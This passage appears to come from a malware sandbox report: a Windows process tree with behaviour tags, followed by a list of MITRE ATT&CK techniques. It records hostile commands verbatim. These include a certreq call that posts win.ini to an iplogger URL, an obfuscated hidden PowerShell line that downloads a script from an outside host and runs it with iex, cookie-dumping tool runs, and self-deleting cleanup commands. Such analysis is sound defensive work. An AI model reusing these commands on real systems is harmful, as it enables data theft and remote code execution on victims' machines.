        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1192
        15⤵
        Program crash
        
        PID:6824
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1344
        15⤵
        Program crash
        
        PID:7232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1360
        15⤵
        Program crash
        
        PID:8700
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1536
        15⤵
        Program crash
        
        PID:7832
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 864
        15⤵
        Program crash
        
        PID:6384
        
        C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\zznote.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\zznote.exe" /Verysilent
        12⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\is-2EB82.tmp\zznote.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2EB82.tmp\zznote.tmp" /SL5="$60506,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\zznote.exe" /Verysilent
        13⤵
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\is-GUTBO.tmp\jg4_4jaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GUTBO.tmp\jg4_4jaa.exe" /silent
        14⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\hjjgaa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-96HHG.tmp\hjjgaa.exe" /Verysilent
        12⤵
        
        PID:8304
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        13⤵
        
        PID:8476
        
        C:\Users\Admin\AppData\Local\Temp\iphsmkhj2rl\5tpe5dpqco1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iphsmkhj2rl\5tpe5dpqco1.exe" /ustwo INSTALL
        8⤵
        
        PID:6200
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 652
        9⤵
        Program crash
        
        PID:4308
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 668
        9⤵
        Program crash
        
        PID:7164
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 672
        9⤵
        Program crash
        
        PID:2252
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 804
        9⤵
        Program crash
        
        PID:5008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 880
        9⤵
        Program crash
        
        PID:7252
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 948
        9⤵
        Program crash
        
        PID:3244
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1176
        9⤵
        Program crash
        
        PID:3820
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1208
        9⤵
        Program crash
        
        PID:8248
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 1144
        9⤵
        Program crash
        
        PID:8296
        
        C:\Users\Admin\AppData\Local\Temp\g3bypkfjuhn\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\g3bypkfjuhn\chashepro3.exe" /VERYSILENT
        8⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\is-CAN02.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CAN02.tmp\chashepro3.tmp" /SL5="$20502,1446038,58368,C:\Users\Admin\AppData\Local\Temp\g3bypkfjuhn\chashepro3.exe" /VERYSILENT
        9⤵
        
        PID:2112
        
        C:\Program Files (x86)\JCleaner\whiterauf.exe
        
        "C:\Program Files (x86)\JCleaner\whiterauf.exe"
        10⤵
        
        PID:4892
        
        C:\Program Files (x86)\JCleaner\whiterauf.exe
        
        "{path}"
        11⤵
        
        PID:1412
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "C:\Program Files (x86)\JCleaner\Venita.exe"
        10⤵
        
        PID:6800
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "{path}"
        11⤵
        
        PID:7132
        
        C:\Program Files (x86)\JCleaner\Abbas.exe
        
        "C:\Program Files (x86)\JCleaner\Abbas.exe"
        10⤵
        
        PID:4524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
        10⤵
        
        PID:6336
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1aSny7"
        10⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        10⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        11⤵
        
        PID:3228
        
        C:\Program Files (x86)\JCleaner\5.exe
        
        "C:\Program Files (x86)\JCleaner\5.exe"
        10⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
        11⤵
        
        PID:8288
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        12⤵
        Delays execution with timeout.exe
        
        PID:8440
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
      4⤵
      Executes dropped EXE
      PID:1696
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:704
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:3912
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      PID:1180
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
      4⤵
      Executes dropped EXE
      PID:3216
    - - C:\ProgramData\7174832.78
        
        "C:\ProgramData\7174832.78"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2248
      - C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        6⤵
        Executes dropped EXE
        
        PID:2352
    - - C:\ProgramData\4447869.48
        
        "C:\ProgramData\4447869.48"
        5⤵
        Executes dropped EXE
        
        PID:2832
    - - C:\ProgramData\6360720.69
        
        "C:\ProgramData\6360720.69"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4060
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:3224
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:2844
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:4200

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3504
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C3B3E369BEE7AA77E1C16160E62481FC C
  2⤵
  - Loads dropped DLL
  PID:2760

C:\Users\Admin\AppData\Local\Temp\is-CV2NI.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CV2NI.tmp\vict.tmp" /SL5="$10274,870426,780800,C:\Users\Admin\AppData\Local\Temp\1fwxrgyryn0\vict.exe" /VERYSILENT /id=535
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4368
- C:\Users\Admin\AppData\Local\Temp\is-1RF22.tmp\wimapi.exe
  "C:\Users\Admin\AppData\Local\Temp\is-1RF22.tmp\wimapi.exe" 535
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5292
- - C:\Users\Admin\AppData\Local\Temp\LNRGIRQIh.exe
    "C:\Users\Admin\AppData\Local\Temp\LNRGIRQIh.exe"
    3⤵
    PID:6100
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im LNRGIRQIh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\LNRGIRQIh.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:6904
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im LNRGIRQIh.exe /f
        5⤵
        Kills process with taskkill
        
        PID:7000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:6072
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
    3⤵
    PID:6756
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
      4⤵
      PID:3700

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4540

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6056

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:876

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Checks SCSI registry key(s)
PID:1968
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4e1a36a1-1842-2a4e-a989-6649199c765c}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  PID:2272
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"
  2⤵
  PID:5764

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5760

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:1120

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:5640
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:2404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6836

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6152

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\4a754087c6e94c248abf4539aedd91f6 /t 7140 /p 6836
1⤵
PID:6552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3820

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5520

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7544

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5328

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7984

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7200

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5696

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1460

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4008

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Bootkit

T1067

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery